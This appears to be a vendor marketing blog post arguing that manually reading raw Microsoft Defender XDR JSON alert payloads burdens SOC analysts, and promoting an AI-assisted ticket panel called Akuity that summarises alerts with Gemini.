In modern security operations centers (SOCs), data is both a blessing and a curse. Microsoft Defender XDR (Extended Detection and Response) is among the most powerful detection solutions on the market. It captures the slightest anomalies across desktops, servers, messaging and cloud identities. However, the raw output of these detections materializes in a form that is formidable for humans: the JSON (JavaScript Object Notation) format.
For a Level 1 (L1) SOC Analyst, spending your day manually reading and decoding JSON payloads of several thousand lines is not only tedious: it is the worst enemy of your productivity, your mental health, and the overall effectiveness of your cyber defense. Find out why this approach slows down your Mean Time to Resolution (MTTR) and how artificial intelligence solves this impasse.
Metadata Hell: What is a raw Defender payload?
When a suspicious event occurs — for example, an attempted network lateral movement or the injection of malicious code into a system process — Microsoft Defender generates an alert and sends it to the SIEM or your management console via API. This alert contains the entire technical context stored in a JSON file.
A raw JSON payload from Microsoft Defender typically contains:
- Unique and opaque system identifiers (GUIDs, Tenant IDs, Device IDs).
- Complete parent and child process histories with endless paths.
- Complex nested structures listing modified registry keys, TCP/UDP network connections, and cryptographic hashes (SHA256 Hashes).
- Script payloads that are frequently Base64 obfuscated or hidden by complex encoding functions.
For the human eye, interpreting this stream of raw text requires intense concentration. The analyst must scroll the screen through thousands of lines, copy and paste character strings to decode them in third-party tools, and try to mentally reconstruct the attack execution tree. This manual deciphering is a major source of cognitive fatigue, often calledFatigue alert. Even worse, information saturation dilutes critical weak signals amid a sea of innocuous metadata.
Loss of context in the midst of a cyber crisis
The main problem with manually reading JSON logs is fragmentation and wasted time during crises. Faced with a spreading ransomware attack, every minute of indecision allows the attacker to compromise new machines.
If your analyst spends 15 minutes reading the JSON to figure out that the alert came from a booby-trapped Word document that launched a command prompt (CMD) to download a malicious binary, the race is already lost. Fragmented navigation between the different tabs of the Microsoft native console to validate the metadata of the device or user concerned only accentuates this critical latency. The security expert spends his time doing textual micro-analysis rather than orchestrating emergency remediation actions.
The solution: Instant synthesis powered by AI
To give defenders the advantage again, a modern SOC platform like Akuity no longer requires humans to read raw data. It is the out-of-band artificial intelligence which is responsible for ingesting, parsing and translating the JSON payload on the fly.
1. Natural language translation
When a ticket is opened within the Akuity SOC Ticket Panel, the "Details / Analysis" tab offers an immediate summary automatically written by the Google Gemini AI. The algorithm instantly reads thousands of lines of complex JSON sent by Microsoft Graph and generates a clear summary of the incident in just a few lines: who is patient zero, what action was attempted, and what the actual danger level is.
2. Access to raw JSON preserved for experts
Automation does not mean opacity. If a Level 2 or Level 3 (L2/L3) analyst wishes to conduct an in-depth investigation (forensic) or verify a specific cryptographic signature, the interface includes a dedicated button“Downloading raw JSON”. In one click, the expert recovers the original payload transmitted by Microsoft Defender, thus combining the speed of AI synthesis with the rigor of raw analysis.
3. Dynamic complexity hiding
To provide maximum visual comfort and avoid information overload, the Akuity ticket panel applies automatic masking of empty sections. If the incident does not have any impacted emails or network indicators, these components do not clutter the screen. The analyst only focuses on the real evidence of the attack (Intune devices impacted, Entra ID users compromised).
Conclusion: Free your analysts from menial tasks
Asking qualified cyber engineers to spend their time analyzing raw JSON text files is an economic and operational contradiction. By entrusting the analysis and initial synthesis to contextual artificial intelligence, you drastically reduce the fatigue of your teams and allow them to concentrate on their real added value: decision-making and rapid remediation.
Don't let your teams drown in raw logs anymore.> Find out howAkuity SOC AI-assisted Cockpitinstantly conveys the complexity of Microsoft Defender.